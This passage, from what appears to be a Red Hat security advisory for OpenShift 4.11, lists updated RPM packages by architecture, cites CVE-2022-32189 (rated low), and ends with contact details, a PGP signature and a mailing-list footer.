openvswitch2.17-ipsec-2.17.0-62.el8fdp.aarch64.rpm  
python3-openvswitch2.17-2.17.0-62.el8fdp.aarch64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-62.el8fdp.aarch64.rpm

noarch:  
butane-redistributable-0.15.0-3.rhaos4.11.el8.noarch.rpm  
openshift-ansible-4.11.0-202211072116.p0.gdf73941.assembly.stream.el8.noarch.rpm  
openshift-ansible-test-4.11.0-202211072116.p0.gdf73941.assembly.stream.el8.noarch.rpm  
openshift-kuryr-cni-4.11.0-202211072116.p0.g93daed6.assembly.stream.el8.noarch.rpm  
openshift-kuryr-common-4.11.0-202211072116.p0.g93daed6.assembly.stream.el8.noarch.rpm  
openshift-kuryr-controller-4.11.0-202211072116.p0.g93daed6.assembly.stream.el8.noarch.rpm  
openvswitch2.17-test-2.17.0-62.el8fdp.noarch.rpm  
python3-kuryr-kubernetes-4.11.0-202211072116.p0.g93daed6.assembly.stream.el8.noarch.rpm

ppc64le:  
atomic-openshift-service-idler-4.11.0-202211072116.p0.ga0f9090.assembly.stream.el8.ppc64le.rpm  
butane-0.15.0-3.rhaos4.11.el8.ppc64le.rpm  
butane-debuginfo-0.15.0-3.rhaos4.11.el8.ppc64le.rpm  
butane-debugsource-0.15.0-3.rhaos4.11.el8.ppc64le.rpm  
network-scripts-openvswitch2.17-2.17.0-62.el8fdp.ppc64le.rpm  
openshift-clients-4.11.0-202211072116.p0.g142cb44.assembly.stream.el8.ppc64le.rpm  
openshift-hyperkube-4.11.0-202211072116.p0.g5157800.assembly.stream.el8.ppc64le.rpm  
openvswitch2.17-2.17.0-62.el8fdp.ppc64le.rpm  
openvswitch2.17-debuginfo-2.17.0-62.el8fdp.ppc64le.rpm  
openvswitch2.17-debugsource-2.17.0-62.el8fdp.ppc64le.rpm  
openvswitch2.17-devel-2.17.0-62.el8fdp.ppc64le.rpm  
openvswitch2.17-ipsec-2.17.0-62.el8fdp.ppc64le.rpm  
python3-openvswitch2.17-2.17.0-62.el8fdp.ppc64le.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-62.el8fdp.ppc64le.rpm

s390x:  
atomic-openshift-service-idler-4.11.0-202211072116.p0.ga0f9090.assembly.stream.el8.s390x.rpm  
butane-0.15.0-3.rhaos4.11.el8.s390x.rpm  
butane-debuginfo-0.15.0-3.rhaos4.11.el8.s390x.rpm  
butane-debugsource-0.15.0-3.rhaos4.11.el8.s390x.rpm  
network-scripts-openvswitch2.17-2.17.0-62.el8fdp.s390x.rpm  
openshift-clients-4.11.0-202211072116.p0.g142cb44.assembly.stream.el8.s390x.rpm  
openshift-hyperkube-4.11.0-202211072116.p0.g5157800.assembly.stream.el8.s390x.rpm  
openvswitch2.17-2.17.0-62.el8fdp.s390x.rpm  
openvswitch2.17-debuginfo-2.17.0-62.el8fdp.s390x.rpm  
openvswitch2.17-debugsource-2.17.0-62.el8fdp.s390x.rpm  
openvswitch2.17-devel-2.17.0-62.el8fdp.s390x.rpm  
openvswitch2.17-ipsec-2.17.0-62.el8fdp.s390x.rpm  
python3-openvswitch2.17-2.17.0-62.el8fdp.s390x.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-62.el8fdp.s390x.rpm

x86_64:  
atomic-openshift-service-idler-4.11.0-202211072116.p0.ga0f9090.assembly.stream.el8.x86_64.rpm  
butane-0.15.0-3.rhaos4.11.el8.x86_64.rpm  
butane-debuginfo-0.15.0-3.rhaos4.11.el8.x86_64.rpm  
butane-debugsource-0.15.0-3.rhaos4.11.el8.x86_64.rpm  
network-scripts-openvswitch2.17-2.17.0-62.el8fdp.x86_64.rpm  
openshift-clients-4.11.0-202211072116.p0.g142cb44.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.11.0-202211072116.p0.g142cb44.assembly.stream.el8.x86_64.rpm  
openshift-hyperkube-4.11.0-202211072116.p0.g5157800.assembly.stream.el8.x86_64.rpm  
openvswitch2.17-2.17.0-62.el8fdp.x86_64.rpm  
openvswitch2.17-debuginfo-2.17.0-62.el8fdp.x86_64.rpm  
openvswitch2.17-debugsource-2.17.0-62.el8fdp.x86_64.rpm  
openvswitch2.17-devel-2.17.0-62.el8fdp.x86_64.rpm  
openvswitch2.17-ipsec-2.17.0-62.el8fdp.x86_64.rpm  
python3-openvswitch2.17-2.17.0-62.el8fdp.x86_64.rpm  
python3-openvswitch2.17-debuginfo-2.17.0-62.el8fdp.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32189  
https://access.redhat.com/security/updates/classification/#low

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY38VZ9zjgjWX9erEAQgEMhAAhjqGsfr5SqPrvV1shtcSGDOofkZKaQhG  
BsWvXApooS/lIJrJ9tuUwSREDrD8sw2iddS7cT2Fo+MFs6slTlfM9obahZEPoO8Y  
RklJHcaI6n5qxfrHPNeho71L0awjksi/yCvo7PBZy1w3aYwhwAkHrDZs3srUNEN4  
qWvdTu/Gxvmre13MA0OMNVKud9OqRayJehFaWjizdbe1Q19lJSiYaIRtzyo14+j5  
ZB62tuT7gObTr90M9YsNWic8Ato2A5s3IGY6mFmh6WEhJbHXojEnXonE6ph/2q80  
Fu+wN3iiX5u++lNGF/UZzYONIiO9L7ik61F931a/oUv5mDuJvll0zPtArxCuvb/J  
TiDYnPsyaaB9wWetpL2cI9TYzRjeqmzX2UEDdrAIQ+sPFPlwtbTEFqkoyZt47ko1  
TPzTsOMrSv/wFrP0+ntyLcUZgEOrfElZX6OB1FtBsJV1I//1Pte6N9bDgSpCMQ8r  
v9qlBw9bOS0a2ifSK9Dng/y10dlK05UVOuljkq+i1wE/cjnSGD1F8uoTHdiGGPcr  
W6G1MJmvhlreHUtwyd/S/WbrTzv2jK3FTxMpGerM6pUPt/4EV1JMnUBXEVx1kZfL  
A8LJ2y1AoqJAgP/5y3ORAZ2CKWeUfspjUgOeKVq9oFBbkIHe8Ol96eRmLr2bxf9J  
TU+JSdiRJas=2ICB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm